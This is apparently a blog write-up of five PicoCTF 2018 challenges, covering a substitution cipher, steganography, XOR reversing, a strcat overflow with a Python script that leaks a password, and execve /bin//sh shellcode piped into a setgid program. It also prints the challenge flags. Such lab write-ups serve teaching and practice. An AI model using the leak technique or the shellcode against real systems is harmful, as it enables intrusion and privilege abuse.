PicoCTF 2018, part 41 through 45

Introduction

This is a continuation of the series on the PicoCTF 2018 challenges I have completed so far. You can find the previous write-up here. You can find a collection of other write-ups in this series on the home page or through the related posts below this post. The challenges are getting elaborate and fun, so we're going to do 5 write-ups per post.

Hertz 2 (200 points)

This challenge gives you another slice of text through a nc connection you need to decipher.

This flag has been encrypted with some kind of cipher, can you decrypt it? Connect with nc 2018shell.picoctf.com 12521.

When you connect to the server using netcat you are greeted by a small chunk of encoded text. Immediately you can recognize the format of the flag in there as well, so that might give us some hints on the cipher. Here's the enciphered text:

Pqd ryfag owenj vet lyimb eudw pqd khzx ces. F ahj'p odkfdud pqfb fb byaq hj dhbx mweokdi fj Mfae. Fp'b hkiebp hb fv F bekudc h mweokdi hkwdhcx! Eghx, vfjd. Qdwd'b pqd vkhs: mfaeAPV{byobpfpypfej_afmqdwb_hwd_pee_dhbx_qqqqfkpmpp}

You could say that ['m', 'f', 'a', 'e', 'A', 'P', 'V'] = ['p', 'i', 'c', 'o', 'C', 'T', 'F']. This might help any brute-force tool / attack tool we use to find a solution sooner. I decided to use quipqiup for this and used mfaeAPV=picoCTF for the Clues field. This results in the following output:

The ?uic? bro?n fo? ?umps over the la?y do?. I can't believe this is such an easy problem in Pico. It's almost as if I solved a problem already! O?ay, fine. Here's the fla?: picoCTF{substitution_ciphers_are_too_easy_hhhhiltptt}

Even though we now have the flag, we can still expand the Clues field for quipqiup with characters we deduce from the deciphered text: + rgntlzs=qkwxjzg = mfaeAPVrgntlzs=picoCTFqkwxjzg. With these updated clues, we get the full deciphered text:

The quick brown fox jumps over the lazy dog. I can't believe this is such an easy problem in Pico. It's almost as if I solved a problem already! Okay, fine. Here's the flag: picoCTF{substitution_ciphers_are_too_easy_hhhhiltptt}
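As a cross-check that needs no external tool: the pangram at the start of the message contains every letter of the alphabet, so the ciphertext/plaintext pair above is enough to rebuild the complete key. Here is a minimal Python sketch, assuming the cipher is a plain monoalphabetic substitution. The helper names build_key and decipher are my own and not part of the challenge.

```python
# Ciphertext and plaintext of the opening pangram, copied from the output above
cipher_pangram = "Pqd ryfag owenj vet lyimb eudw pqd khzx ces"
plain_pangram  = "The quick brown fox jumps over the lazy dog"

# Build a lowercase cipher -> plain mapping from an aligned text pair
def build_key(cipher, plain):
    key = {}
    for c, p in zip(cipher.lower(), plain.lower()):
        if c.isalpha():
            key[c] = p
    return key

# Apply the mapping, keeping case and leaving non-letters untouched
def decipher(text, key):
    out = []
    for ch in text:
        plain = key.get(ch.lower(), ch)
        out.append(plain.upper() if ch.isupper() else plain)
    return "".join(out)

key  = build_key(cipher_pangram, plain_pangram)
flag = decipher("mfaeAPV{byobpfpypfej_afmqdwb_hwd_pee_dhbx_qqqqfkpmpp}", key)
print(len(key), flag)
```

Because the pangram covers all 26 letters, no guessing is left for the flag part.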

flag: picoCTF{substitution_ciphers_are_too_easy_hhhhiltptt}

Leak Me (200 points)

This challenge wants us to authenticate to a service running remotely and get the flag. The title implies we need to leak data somehow.

Can you authenticate to this service and get the flag? Connect with nc 2018shell.picoctf.com 23685. Source.

I first decided to connect to the service and see what the application wants from us. When you connect to the above service, you'll see that you are talking to the application directly. Here is the input/output from a session:

What is your name?
> xoru
Hello xoru,
Please Enter the Password.
> MyAmazingPassword
Incorrect Password!

This is good news, there's some input the application expects from me, so there might be an exploit there somewhere. I think it's time to look at the source code and see what we can do. I'll list the full C source code here, so that I can refer to certain lines in code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

int flag() {
  char flag[48];
  FILE *file;
  file = fopen("flag.txt", "r");
  if (file == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, .....\n");
    exit(0);
  }

  fgets(flag, sizeof(flag), file);
  printf("%s", flag);
  return 0;
}


int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  // real pw: 
  FILE *file;
  char password[64];
  char name[256];
  char password_input[64];

  memset(password, 0, sizeof(password));
  memset(name, 0, sizeof(name));
  memset(password_input, 0, sizeof(password_input));

  printf("What is your name?\n");

  fgets(name, sizeof(name), stdin);
  char *end = strchr(name, '\n');
  if (end != NULL) {
    *end = '\x00';
  }

  strcat(name, ",\nPlease Enter the Password.");

  file = fopen("password.txt", "r");
  if (file == NULL) {
    printf("Password File is Missing. Problem is Misconfigured, ....\n");
    exit(0);
  }

  fgets(password, sizeof(password), file);

  printf("Hello ");
  puts(name);

  fgets(password_input, sizeof(password_input), stdin);
  password_input[sizeof(password_input)] = '\x00';

  if (!strcmp(password_input, password)) {
    flag();
  }
  else {
    printf("Incorrect Password!\n");
  }
  return 0;
}

The first thing I can notice is that three buffers are placed on the stack: password[64], name[256], password_input[64] - this is something that has to be remembered, as there might be an exploit somehow here. When you disassemble the code and look at it in IDA you'll see that the password[64] buffer comes right after the name[256] buffer.

password_input_buff = byte ptr -194h
name_buff           = byte ptr -154h
password_buff       = byte ptr -54h  ; password_buff comes after name_buff in memory

If you can somehow get to password_buff you might be able to read (leak) the password data that is read from the password.txt file. The next slice of code might be just what I needed for that:

  printf("What is your name?\n");

  fgets(name, sizeof(name), stdin);
  char *end = strchr(name, '\n');
  if (end != NULL) {
    *end = '\x00';
  }

  strcat(name, ",\nPlease Enter the Password.");

At first the program reads the name from stdin into the name[256] buffer. fgets reads a bounded amount of data: at most sizeof(name) - 1 = 255 characters, after which it always appends a terminating NUL-byte. If the input contained a newline, that newline is replaced with a NUL-byte as well. That terminator is something we need to get out of the way.

After that, for some reason, the program concatenates ",\nPlease Enter the Password." to the name buffer. This is where the exploit lives. strcat appends the specified string to the end of the target string name without checking the size of the buffer. This means that it starts writing at the position of the terminating NUL-char.

If you send a name of 255 bytes or more, fgets completely fills the name buffer: 255 characters plus the NUL-byte in the last slot. strcat then overwrites that NUL-byte with the comma of the password prompt and writes the rest of the prompt past the end of name: it writes into the password buffer. This is enormously useful, considering the name string now ends in the password buffer.

After this ordeal the program reads the password from password.txt into password[64], overwriting the overflowed prompt text. When that is completed, it prints Hello <name> - however the name buffer itself no longer contains a NUL-byte, so puts keeps going into the password buffer - we will see our 255 characters, the comma and the password instead of just the name!
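To make the sequence of writes easier to follow, here is a small Python model of the two adjacent buffers. It is only a sketch: it assumes password sits directly behind name, as the IDA offsets suggest, and the secret b"hunter2\n" is a made-up placeholder, not the real password. The function names are mine.

```python
NAME_SIZE, PASSWORD_SIZE = 256, 64
PROMPT = b",\nPlease Enter the Password."

# Read a C string: everything from start up to the first NUL byte
def c_string(memory, start):
    return bytes(memory[start:memory.index(0, start)])

def simulate(user_input, secret):
    # name occupies [0, 256), password occupies [256, 320)
    memory = bytearray(NAME_SIZE + PASSWORD_SIZE)

    # fgets(name, 256, stdin): at most 255 bytes, stops after a newline
    line = user_input[:NAME_SIZE - 1]
    if b"\n" in line:
        line = line[:line.index(b"\n") + 1]
    memory[:len(line)] = line
    memory[len(line)] = 0

    # strchr + "*end = 0": replace the newline, if any, with NUL
    if b"\n" in line:
        memory[line.index(b"\n")] = 0

    # strcat(name, PROMPT): starts at the first NUL, no bounds check
    end = memory.index(0)
    memory[end:end + len(PROMPT) + 1] = PROMPT + b"\x00"

    # fgets(password, 64, file): overwrites whatever strcat spilled over
    pw = secret[:PASSWORD_SIZE - 1]
    memory[NAME_SIZE:NAME_SIZE + len(pw) + 1] = pw + b"\x00"

    # puts(name): prints until the first NUL it meets
    return c_string(memory, 0)

print(simulate(b"xoru\n", b"hunter2\n"))
print(simulate(b"A" * 256 + b"\n", b"hunter2\n"))
```

With the short name the prompt is printed as intended. With the long name the output is 255 times A, the comma, and then the placeholder secret.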

You can quickly test this with this one-liner:

python3 -c "print('A'*256)" | nc 2018shell.picoctf.com 23685
# What is your name?
# Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,a_reAllY_s3cuRe_p4s$word_a28d9d
# Incorrect Password!

We could stop here, copy the password and run the nc 2018shell.picoctf.com 23685 command to enter a username and this valid password to get the flag, but we could also automate this with a nice python script.

from contextlib import contextmanager
import socket

# Receive data until a certain message is found and return everything read
def recv_until(conn, message):
    data = ""

    while (data.find(message) == -1):
        data += str(conn.recv(32), "utf-8")

    return data

# I like to be able to write with sock(...) as s
@contextmanager
def sock(*args, **kw):
    s = socket.socket(*args, **kw)
    try:
        yield s
    finally:
        s.close()

# length to fill the name buffer with
length = 256

# We'll connect directly to the shell and send our exploit data
HOST = "2018shell.picoctf.com"
PORT = 23685

password = ""

# Determine password by completely filling the name buffer, removing NUL (leak)
with sock(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    recv_until(s, "What is your name?\n")
    s.send(b"A" * length + b"\n")               # send the 'name'
    data = repr(s.recv(1024))                   # receive the name+password

    # split the returned data to isolate the password
    start_of_password = data[(data.find("Hello ") + 6 + length):]
    password          = start_of_password[:start_of_password.find("\\n")]
    print("password found: {:s}".format(password))

# Now knowing the password, send the proper auth request
with sock(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))

    recv_until(s, "What is your name?\n")
    s.send(b"AAAA\n")                           # bogus username, nobody cares

    recv_until(s, "Please Enter the Password.\n")
    s.send(bytes(password, "utf-8") + b"\n")    # send the extracted password

    data = str(s.recv(1024), "utf-8")           # receive the flag!
    print("flag found:     {:s}".format(data))

python3 solution.py
# password found: a_reAllY_s3cuRe_p4s$word_a28d9d
# flag found:     picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_ee6111c9}

flag: picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_ee6111c9}

Now You Don't (200 points)

This challenge provides us with another image that contains some data, somewhere.

We heard that there is something hidden in this picture. Can you find it?

I didn't figure it would be as easy as simply running strings or exiftool on the file, however that's usually what I do first with problems related to images. These commands yielded nothing useful though, so I continued to the next step in my checklist when dealing with images.

I have a couple of tools I use to see if an image contains data using steganography. The first tool, steghide, did not give me anything useful. I ran the command steghide extract -sf nowYouDont.png:

steghide: the file format of the file "nowYouDont.png" is not supported.

I didn't want to give up checking out steganography quite yet and luckily, there is an amazing website that helps us figure out if data (or an image) is hidden in another image. This amazing tool processed this image in no time at all and gave me a nice black-and-white image of the flag. This gave me the idea that the shades of one of the colors differ from the surrounding colors, resulting in a 1-bit greyscale image:

Decoded using online tool

Now this was obviously not enough for me, as I wanted to automate this process using Python. There is an amazing library (a fork of the original library named PIL) called Pillow in Python that allows you to process images. This library also allows you to access pixel data through imageInstance.load(), which returns a matrix of color tuples. This allowed me to identify which channel contained the hidden image and extract it nicely.

from PIL import Image

class LeastSignificantRgbPixelBitCollector:
    'Collect all least significant bits in a 32-bit image'

    def __init__(self, image):
        self.image  = image
        self.data   = image.load()
        self.width  = image.width
        self.height = image.height

    # I could have collected all three channels as image in one go, however I
    # wanted code clarity more than performance in this case. It's fast enough
    def collect_channel_image(self, channel, background, foreground, invert = False):
        image  = Image.new('RGB', (self.width, self.height), "black")
        buffer = image.load()
        colors = (background, foreground)

        if (invert):
            colors = (foreground, background)

        for y in range(0, self.height):
            for x in range(0, self.width):
                # If bit 0 is set, the foreground color is used. If bit 0 is not
                # set, the background color is used. & 1 results in either 0 or 1
                # which is a nice index for our colors tuple
                buffer[x,y] = colors[(self.data[x,y][channel] & 1)]

        return image

    # Collect the least significant bit of the red channel as new image
    def collect_red_image(self, background, foreground, invert = False):
        return self.collect_channel_image(0, background, foreground, invert)

    # Collect the least significant bit of the green channel as new image
    def collect_green_image(self, background, foreground, invert = False):
        return self.collect_channel_image(1, background, foreground, invert)

    # Collect the least significant bit of the blue channel as new image
    def collect_blue_image(self, background, foreground, invert = False):
        return self.collect_channel_image(2, background, foreground, invert)

# Open the original image
with Image.open("nowYouDont.png") as image:
    lsb_collector = LeastSignificantRgbPixelBitCollector(image)
    print("Image loaded, {:d}px x {:d}px".format(lsb_collector.width, lsb_collector.height))

    # Define the channels we want to extract: (channel_index, output_filename, background_color, foreground_color)
    channels = [
        (0, "red_lsb.png",   (40, 0, 0), (220, 0, 0)), 
        (1, "green_lsb.png", (0, 40, 0), (0, 220, 0)), 
        (2, "blue_lsb.png",  (0, 0, 40), (0, 0, 220))
    ]

    # Extract each channel and save it
    for c in channels:
        lsb_collector.collect_channel_image(c[0], c[2], c[3], True).save(c[1])
        print(" - Channel {:d} saved as {:s}".format(c[0], c[1]))

When you run this code and look at the source directory, you'll see the three images. The green_lsb.png and blue_lsb.png files are just green and blue respectively. The red_lsb.png image however contains the flag in text on a dark red background, just like we defined.
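A quicker way to spot the interesting channel, before rendering any images, is to count how often bit 0 is clear or set per channel. The sketch below is my own addition and runs on a tiny synthetic pixel list instead of the real file. With Pillow, the pixels would come from the image.load() matrix used above. It relies on the assumption that the cover image is a flat color, which is what the plain green and blue outputs suggest.

```python
# Count, per RGB channel, how many pixels have bit 0 cleared and set
def lsb_counts(pixels):
    counts = [[0, 0] for _ in range(3)]
    for pixel in pixels:
        for channel in range(3):
            counts[channel][pixel[channel] & 1] += 1
    return counts

# Synthetic stand-in for the image: a flat red area in which two pixels
# differ only in the least significant bit of the red channel
pixels = [(144, 0, 0)] * 6 + [(145, 0, 0)] * 2

counts = lsb_counts(pixels)

# A channel where both bit values occur is a candidate for hidden data
suspects = [c for c, (zeros, ones) in enumerate(counts) if zeros and ones]
print(counts, suspects)
```

On a real photograph all three channels would show mixed bits, so this shortcut only helps for images as uniform as this one.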

Decoded using Python

flag: picoCTF{n0w_y0u_533_m3}

Quackme (200 points)

This challenge gives us another reversing problem: I need to get a flag from a program. I love these challenges!

Can you deal with the Duck Web? Get us the flag from this program. You can also find the program in /problems/quackme_3_9a15a74731538ce2076cd6590cf9e6ca.

This is an interesting program, as it took me a little longer compared to other challenges to solve this. Not because finding the answer took me the longest, but completely understanding the assembly code had me a bit baffled for some reason. I think it is because I simply didn't get why some operations were done in so "many" steps. For example, a buffer is allocated using malloc but the pointer is never used again. This is exactly what people might do to try to confuse you!

When you run the program at the specified path you get the next prompt:

You have now entered the Duck Web, and you're in for a honkin' good time. Can you figure out my trick?

You can enter any amount of text, however it does not matter what you enter (it seems). The program will simply say goodbye with a nice message and exit when you press return:

That's all folks.

I think it is time to reverse this binary in IDA. I took the liberty to label every single one of my findings in the binary ahead, so I can explain it better in this writeup. Let's have a look at the int main(...) function first. That function is not too special to me considering this challenge.

; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near ; DATA XREF: _start+17↑o

var_4 = dword ptr -4
argc  = dword ptr  8
argv  = dword ptr  0Ch
envp  = dword ptr  10h

lea     ecx, [esp+4]
and     esp, 0FFFFFFF0h
push    dword ptr [ecx-4]
push    ebp
mov     ebp, esp
push    ecx
sub     esp, 4
mov     eax, ds:stdout@@GLIBC_2_0
push    0
push    2
push    0
push    eax
call    _setvbuf
add     esp, 10h
sub     esp, 0Ch
push    offset aYouHaveNowEnte ; "You have now entered the Duck Web, and "...
call    _puts
add     esp, 10h
call    do_magic ; Interesting!
sub     esp, 0Ch
push    offset aThatSAllFolks ; "That's all folks."
call    _puts
add     esp, 10h
mov     eax, 0
mov     ecx, [ebp+var_4]
leave
lea     esp, [ecx-4]
retn
main            endp

As you can see, main simply initializes stdout, prints a message "You have now entered....", calls do_magic, prints another message "That's all folks." and then finalizes the program and exits. The only interesting instruction here is the call do_magic which we'll investigate next.

public do_magic
do_magic proc near ; CODE XREF: main+35↓p

xored_byte            = byte  ptr -1Dh
verified_bytes_count  = dword ptr -1Ch
for_loop_index        = dword ptr -18h
entered_input         = dword ptr -14h
entered_input_length  = dword ptr -10h
buffer_dummy?         = dword ptr -0Ch

push    ebp
mov     ebp, esp
sub     esp, 28h
call    read_input                        ; Just reading user input from stdin, safe
mov     [ebp+entered_input], eax          ; Store input in local variable
sub     esp, 0Ch
push    [ebp+entered_input]
call    _strlen                           ; strlen(entered_input)
add     esp, 10h
mov     [ebp+entered_input_length], eax   ; result from strlen stored in local variable
mov     eax, [ebp+entered_input_length]
add     eax, 1                            ; entered_input_length + 1 in eax
sub     esp, 0Ch
push    eax
call    _malloc                           ; malloc(eax)
add     esp, 10h
mov     [ebp+buffer_dummy?], eax          ; store result of malloc in variable
cmp     [ebp+buffer_dummy?], 0            ; ensure memory was allocated
jnz     short loop_initializer            ; jump to loop initializer on success

; When memory allocation failed, an error is printed and the program exits
sub     esp, 0Ch
push    offset aMallocReturned ; "malloc() returned NULL. Out of Memory\n"
call    _puts
add     esp, 10h
sub     esp, 0Ch
push    0FFFFFFFFh
call    _exit

The first part of the do_magic function doesn't do much magic. It reads a string of input from stdin via the read_input function and stores that value in entered_input and its length in entered_input_length by determining the length with strlen.

It then allocates entered_input_length + 1 bytes of memory using malloc and stores the result of the call to malloc in what I called buffer_dummy?. I couldn't determine where this memory was used (or freed). I'm guessing it is used to confuse you and for a little while, it did me. I simply couldn't find any other references to buffer_dummy? aside from the ones used in initialization (we'll see one more part of that later), so I disregarded them.

As a matter of fact, the buffer returned by read_input is also never freed (and it should be). Memory leaks everywhere!

If the memory allocation of the dummy buffer failed, the program displays an error message and exits. If it did not fail, the jnz short loop_initializer instruction jumps over that error handling and moves the instruction pointer to the interesting part of this function - let's have a look at that now.

; This seems like a typical for(int i = 0; i < input_length; i += 1) { ... }
loop_initializer:
  mov     eax, [ebp+entered_input_length]
  add     eax, 1                            ; entered_input_length + 1 in eax
  sub     esp, 4
  push    eax
  push    0
  push    [ebp+buffer_dummy?]               ; memset(buffer_dummy?, 0, entered_input_length + 1 (eax))
  call    _memset
  add     esp, 10h
  mov     [ebp+verified_bytes_count], 0     ; int verified_bytes_count = 0
  mov     [ebp+for_loop_index], 0           ; int for_loop_index = 0
  jmp     short for_loop_condition          ; jump to loop condition
; ---------------------------------------------------------------------------

for_loop_body:
  mov     eax, [ebp+for_loop_index]         ; get current i
  add     eax, 8048858h                     ; add address to xor key
  movzx   ecx, byte ptr [eax]               ; read 1 byte of key to ecx
  mov     edx, [ebp+for_loop_index]         ; get current i
  mov     eax, [ebp+entered_input]          ; get address to entered_input
  add     eax, edx                          ; add address and current i
  movzx   eax, byte ptr [eax]               ; read 1 byte of input to eax
  xor     eax, ecx                          ; xor byte of key with byte of input
  mov     [ebp+xored_byte], al              ; store xor result in xored_byte
  mov     edx, greetingMessage              ; get address to greetingMessage
  mov     eax, [ebp+for_loop_index]         ; get current i
  add     eax, edx                          ; add address and current i
  movzx   eax, byte ptr [eax]               ; read 1 byte of greetingMessage to eax
  cmp     al, [ebp+xored_byte]              ; compare read byte with xored_byte
  jnz     short is_entered_data_valid       ; jump over verified_bytes_count + 1 if not equal
  add     [ebp+verified_bytes_count], 1     ; conditions met, verified_bytes_count + 1

; if statement
is_entered_data_valid:
  cmp     [ebp+verified_bytes_count], 19h   ; verified_bytes_count == 25?
  jnz     short for_loop_increment          ; no, jump to loop increment and continue
  sub     esp, 0Ch
  push    offset aYouAreWinner              ; yep, 25 valid bytes! We win!
  call    _puts
  add     esp, 10h
  jmp     short return_from_f               ; return from function
; ---------------------------------------------------------------------------

for_loop_increment:
  add [ebp+for_loop_index], 1               ; increment statement in for-loop

for_loop_condition:                         ; condition statement in for loop
  mov     eax, [ebp+for_loop_index]
  cmp     eax, [ebp+entered_input_length]
  jl      short for_loop_body               ; condition: (for_loop_index < entered_input_length)

; return
return_from_f:
  leave
  retn
do_magic endp

Now this big chunk of code is where the magic happens. This very typical for loop (which I labeled, but you can recognize them quite easily in assembly code) is responsible for applying xor to every byte of a "secret" key and the user input at the same offset. The result of this xor operation should be equal to a byte in the welcome message at that same offset. If that is the case, the byte will be counted in verified_bytes_count. In the for loop there is another if statement that checks if verified_bytes_count is equal to 25. If that is the case, all user input was correct and you win! See the comments in the assembly code for further explanation.

For clarity, here's my interpretation of the disassembled do_magic function in C/C++:

void do_magic() {
    const char *entered_input   = read_input(); // defined in challenge program, see IDA
    size_t entered_input_length = strlen(entered_input);
    char *buffer_dummy          = malloc(entered_input_length + 1);

    // could not allocate memory
    if (!buffer_dummy) {
        puts("malloc() returned NULL. Out of Memory\n");
        exit(-1);
    }

    // clearing of the buffer nobody knows what it is for...
    memset(buffer_dummy, 0, entered_input_length + 1);

    /*
        the interesting part, perform a xor operation on your input and the
        secret key at address 0x8048858 to see if it results in the greetingMessage
        greetingMessage:  'You have now entered the Duck Web, ...' (need 25 chars)
        key at 0x8048858: [
            0x29, 0x06, 0x16, 0x4F, 0x2B,
            0x35, 0x30, 0x1E, 0x51, 0x1B,
            0x5B, 0x14, 0x4B, 0x08, 0x5D,
            0x2B, 0x52, 0x17, 0x01, 0x57,
            0x16, 0x11, 0x5C, 0x07, 0x5D
        ]
    */

    /*
        The number of bytes that successfully xor to the welcome message.
    */
    int verified_bytes_count = 0;

    // The magic loop
    for (int for_loop_index = 0; for_loop_index < entered_input_length; for_loop_index += 1) {
        char xored_byte = entered_input[for_loop_index] ^ xor_key[for_loop_index];

        if (xored_byte == greetingMessage[for_loop_index])
            verified_bytes_count += 1;

        if (verified_bytes_count == 25) {
            puts("You are winner!");
            return;
        }
    }

    return;
}

Now getting the flag should be extremely easy knowing all of this. If user_input XOR secret_key results in the welcome message (at least 25 characters of it), you can say that welcome_message XOR secret_key will result in the desired user input to get the You are winner! message. I bet that this is the flag too!

Python can be used to do that for us:

# convert an array of bytes to a string
def str_from_bytes(bytes):
    return ''.join([chr(c) for c in bytes])

# xor every byte in string a to every byte in string b and produce a new string
def xor_str(a, b):
    return ''.join([chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(a, b)])


# The welcome message and the xor-key from the program deduced from the
# disassembled program.
# Only the first 25 characters are needed from the original message:
# You have now entered the Duck Web, and you're in for a honkin' good time.
welcome_message = "You have now entered the Duck Web, ..."
decrypt_message = str_from_bytes([
    0x29, 0x06, 0x16, 0x4F, 0x2B,
    0x35, 0x30, 0x1E, 0x51, 0x1B,
    0x5B, 0x14, 0x4B, 0x08, 0x5D,
    0x2B, 0x52, 0x17, 0x01, 0x57,
    0x16, 0x11, 0x5C, 0x07, 0x5D
])

# welcome_message[:25] XOR decrypt_message = desired input (and flag)
print(xor_str(welcome_message[:len(decrypt_message)], decrypt_message))

Execute this code and get the flag:

python3 solution.py
# > picoCTF{qu4ckm3_7ed36e4b}

To verify that this is actually what we need, run it through the program as this is also the expected input:

./main
# Can you figure out my trick?
# picoCTF{qu4ckm3_7ed36e4b}
# You are winner!
# That's all folks.
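If you don't have the binary at hand, the same check can be reproduced offline with a small Python model of do_magic. This is only my reading of the disassembly, not the program itself. It stops after the 25 key bytes listed above, whereas the real loop would keep reading whatever follows the key in memory.

```python
GREETING = b"You have now entered the Duck Web, and you're in for a honkin' good time."
XOR_KEY  = bytes([
    0x29, 0x06, 0x16, 0x4F, 0x2B,
    0x35, 0x30, 0x1E, 0x51, 0x1B,
    0x5B, 0x14, 0x4B, 0x08, 0x5D,
    0x2B, 0x52, 0x17, 0x01, 0x57,
    0x16, 0x11, 0x5C, 0x07, 0x5D
])

# Return True when the input would reach the "You are winner!" branch
def do_magic(entered_input):
    verified_bytes_count = 0

    # Model limitation: only the 25 known key bytes are checked
    for i in range(min(len(entered_input), len(XOR_KEY))):
        if (entered_input[i] ^ XOR_KEY[i]) == GREETING[i]:
            verified_bytes_count += 1

        if verified_bytes_count == 25:
            return True

    return False

print(do_magic(b"picoCTF{qu4ckm3_7ed36e4b}"))
print(do_magic(b"xoru"))
```

Note that the loop counts matching bytes, so any input shorter than 25 bytes can never win.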

Nice! That was fun!

flag: picoCTF{qu4ckm3_7ed36e4b}

Shellcode (200 points)

This challenge involves executing shellcode in the provided program, which doesn't prove to be extremely complicated.

This program executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_4_99838609970da2f5f6cf39d6d9ed57cd on the shell server. Source.

This challenge I believe is an introduction to shellcode injection for people who have never done this before. Shellcode typically is a small piece of executable code that can be injected into a target program to obtain a shell that would otherwise not be available.

The specified remote path contains the vuln program, vuln.c source code (which can also be downloaded by clicking the link) and the flag.txt. The problem here is that we as a user don't have permission to read flag.txt, but the vuln program does.

The vuln program has the setgid bit set, meaning that it runs with the group of the vuln file as its effective group no matter who executes vuln. That group just so happens to be the one that is allowed to read flag.txt. The shellcode we inject should open a shell, and that shell then has permission to read flag.txt.

ls -al
# -r--r-----   1 hacksports shellcode_4     34 Nov 15 02:22 flag.txt
# -rwxr-sr-x   1 hacksports shellcode_4 725408 Nov 15 02:22 vuln
# -rw-rw-r--   1 hacksports hacksports     562 Nov 15 02:22 vuln.c
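The s in the group triplet of vuln is the setgid bit. As a small illustration, Python's stat module can turn numeric modes into the same strings ls prints. The octal modes 2755 and 0440 below are my reading of the listing above, not values taken from the server.

```python
import stat

# Regular files: 2755 (setgid + rwxr-xr-x) for vuln, 0440 for flag.txt
vuln_mode = stat.S_IFREG | 0o2755
flag_mode = stat.S_IFREG | 0o0440

print(stat.filemode(vuln_mode))          # mode string for vuln
print(bool(vuln_mode & stat.S_ISGID))    # is the setgid bit set?
print(stat.filemode(flag_mode))          # mode string for flag.txt
```

The flag file is readable by its owner and group only, which is why the group of the running process matters here.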

Let's have a look at the included vuln.c source code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter a string!");
  vuln(buf);

  puts("Thanks! Executing now...");

  ((void (*)())buf)();

  return 0;
}

As you can see, the void vuln(char *buf) function simply reads the user input to a buffer that is 148 bytes large. It also echoes the input, so whatever you type is also written back to you. After that, the buffer is simply executed as a function returning void, taking no parameters.

This means that anything that is entered as input in this program will be executed by the program, no matter what it is. Any shellcode with a maximum length of 148 bytes can be used here, but most shellcode for starting /bin/sh is much shorter than that.

On 32-bit x86 Linux you can make system calls from your assembly code with the int 80h instruction. This mechanism gives us a huge amount of freedom with little space required. In a few bytes of assembly you can push the data /bin//sh onto the stack. The double slash between bin and sh doesn't matter to sys_execve and it gives us a nice 8-byte string. On 32-bit, that fits perfectly in two 32-bit integers.

You can then copy the stack pointer esp to ebx, which is the parameter register for sys_execve - because esp points to the start of the data we just pushed (the path to /bin//sh). sys_execve will read the path until a NUL byte is encountered, hence the first push eax in the code below: that's the terminating NUL character.

After clearing ecx and edx the instruction int 80h is executed, which will in turn execute /bin//sh. The shell runs and you can do anything the program is allowed to do. If sys_execve succeeds it replaces the process image with the shell, so execution never returns to our shellcode. The trailing sys_exit syscall only runs if sys_execve fails, in which case it stops program execution cleanly and prevents a segmentation fault.

xor    eax,eax        ; eax = 0, terminating NUL
push   eax            ; push 0 to stack, end of path string 
push   0x68732f2f     ; push //sh to stack as 32 bit integer
push   0x6e69622f     ; push /bin to stack as 32 bit integer, /bin//sh\0 done!
mov    ebx,esp        ; move stack pointer to ebx, ebx is param for sys_execve!
mov    ecx,eax        ; ecx = 0 for sys_execve
mov    edx,eax        ; edx = 0 for sys_execve
mov    al,0xb         ; eax = 11 = sys_execve
int    0x80           ; syscall sys_execve with param in ebx (/bin//sh\0)
xor    eax,eax        ; only reached if sys_execve failed: eax = 0
inc    eax            ; eax = 1 = sys_exit
int    0x80           ; syscall sys_exit, clean exit to prevent segfault
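The three push instructions in the listing above can be checked in Python. x86 is little-endian and the stack grows towards lower addresses, so the value pushed last ends up first in memory. A minimal sketch (the variable names are mine):

```python
import struct

# The three values pushed by the shellcode, in program order
pushes = [0x00000000, 0x68732f2f, 0x6e69622f]

# Each push lands at a lower address than the previous one, so prepend
stack = b""
for value in pushes:
    stack = struct.pack("<I", value) + stack

# What sys_execve sees when it reads the path at esp up to the first NUL
path = stack.split(b"\x00", 1)[0]
print(stack, path)
```

This is why //sh is pushed before /bin: read from esp upwards, the bytes spell /bin//sh followed by the terminating NUL.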

Assembled it looks like this string in Python:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

With echo -en in a shell, you can simply pipe this shellcode to the vuln program; the trailing cat keeps stdin open so that whatever you type afterwards goes to the spawned shell. We can do this on the remote shell server and get our flag!

(echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./vuln
# Enter a string!
# 1�Ph//shh/bin�����°
#                    1�@̀
# Thanks! Executing now...
ls -al
# total 776
# drwxr-xr-x   2 root       root          4096 Nov 15 02:22 .
# drwxr-x--x 566 root       root         53248 Nov 15 04:28 ..
# -r--r-----   1 hacksports shellcode_4     34 Nov 15 02:22 flag.txt
# -rwxr-sr-x   1 hacksports shellcode_4 725408 Nov 15 02:22 vuln
# -rw-rw-r--   1 hacksports hacksports     562 Nov 15 02:22 vuln.c
cat flag.txt
# picoCTF{shellc0de_w00h00_b766002c}
